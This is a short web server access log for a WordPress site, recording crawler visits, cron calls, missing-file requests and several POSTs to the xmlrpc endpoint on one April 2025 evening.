198.54.114.83 - - [01/Apr/2025:17:30:50 -0400] "POST /wp-cron.php?doing_wp_cron=1743543050.8657720088958740234375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
66.249.64.168 - - [01/Apr/2025:17:30:50 -0400] "GET /react-dom.js HTTP/1.1" 404 9259 "http://sunquicksf.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.167 - - [01/Apr/2025:17:30:51 -0400] "GET /react.js HTTP/1.1" 404 9259 "http://sunquicksf.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.166 - - [01/Apr/2025:17:30:52 -0400] "GET /react-dom.js HTTP/1.1" 404 9259 "http://sunquicksf.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.168 - - [01/Apr/2025:17:30:53 -0400] "GET /react.js HTTP/1.1" 404 9259 "http://sunquicksf.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.168 - - [01/Apr/2025:17:31:28 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "Googlebot-Image/1.0"
216.244.66.196 - - [01/Apr/2025:17:33:06 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.171.207.96 - - [01/Apr/2025:17:39:53 -0400] "GET /?p=9955 HTTP/1.1" 200 97711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [01/Apr/2025:17:53:38 -0400] "POST /wp-cron.php?doing_wp_cron=1743544417.8998680114746093750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
132.148.183.184 - - [01/Apr/2025:17:53:37 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
43.130.74.193 - - [01/Apr/2025:18:13:43 -0400] "GET / HTTP/1.1" 200 97711 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.214.124.144 - - [01/Apr/2025:18:18:02 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
216.244.66.196 - - [01/Apr/2025:18:18:09 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:18:26:38 -0400] "POST /wp-cron.php?doing_wp_cron=1743546397.4118878841400146484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://sunquicksf.com"
216.244.66.196 - - [01/Apr/2025:18:26:34 -0400] "GET /best-ai-programming-languages-python-r-julia-more/ HTTP/1.1" 200 160734 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.218.124.157 - - [01/Apr/2025:18:42:09 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://sunquicksf.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0"
